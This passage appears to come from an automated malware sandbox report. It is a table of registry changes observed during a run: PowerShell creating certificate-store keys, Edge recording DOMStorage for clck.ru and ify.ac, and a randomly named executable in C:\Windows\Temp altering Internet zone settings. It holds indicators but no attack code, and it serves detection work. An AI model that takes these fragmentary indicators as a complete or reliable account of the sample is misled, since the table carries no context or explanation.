| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\Temp\wqgwJMWXAwfbGfvq\aweCcjUdaBzQgay\saOJEXk.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\CIPolicyState = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\Total = "560" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "40C" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "en-US" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\History\CacheLimit = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "SR en-US Locale Handler" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{E164F996-FF93-4675-BDD8-6C47AB0B86B1}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing\NewTabPage\ProcessingFlag = f0be07b13ed7da01 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\Total = "1514" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\DynamicCodePolicy = 05000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total\ = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OnlineHistory\NextBrowserDataLogTime = a0221b0271d7da01 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "HKEY_LOCAL_MACHINE/SOFTWARE\\Microsoft\\Speech_OneCore\\AudioOutput\\TokenEnums\\MMAudioOut\\" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\r1033sr.lxa" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FlipAhead\Meta | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\clck.ru\Total = "1601" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\SOFTWARE | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "Male" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "11.0.2016.0129" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = ecb832b13ed7da01 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\clck.ru\ = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "HW" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\History\CacheLimit = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\lsr1033.lxa" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Rating\Rating Prompt Shown = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\google.com\Total = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\clck.ru\Total = "9" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Speech_OneCore\\Recognizers\\Tokens\\MS-1033-110-WINMO-DNN" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "%windir%\\Speech_OneCore\\Engines\\SR\\en-US-N\\c1033.fe" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\Total = "139" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Cookies\CacheLimit = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\ify.ac\ = "61" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "You have selected %1 as the default voice." | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 1e2c619d3ed7da01 | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage\ify.ac | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\google.com\NumberOfSubdomains = "1" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\Total | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "{14E74C62-DC97-43B0-8F2F-581496A65D60}" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "404" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Software\Microsoft\Speech_OneCore\Isolated\PIjyYIeAhMCaaVR = "436;41c;401;801;c01;1001;1401;1801;1c01;2001;2401;2801;2c01;3001;3401;3801;3c01;4001;42b;42c;82c;42d;423;402;455;403;c04;1004;1404;41a;405;406;465;413;813;809;c09;1009;1409;1809;1c09;2009;2409;2809;2c09;3009;3409;425;438;429;40b;80c;c0c;100c;140c;180c;456;437;807;c07;1007;1407;408;447;40d;439;40e;40f;421;410;810;44b;457;412;812;440;426;427;827;42f;43e;83e;44e;450;414;814;415;416;816;446;418;419;44f;c1a;81a;41b;424;80a;100a;140a;180a;1c0a;200a;240a;280a;2c0a;300a;340a;380a;3c0a;400a;440a;480a;4c0a;500a;430;441;41d;81d;45a;449;444;44a;41e;41f;422;420;820;443;843;42a;540a" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0" | C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe | N/A |
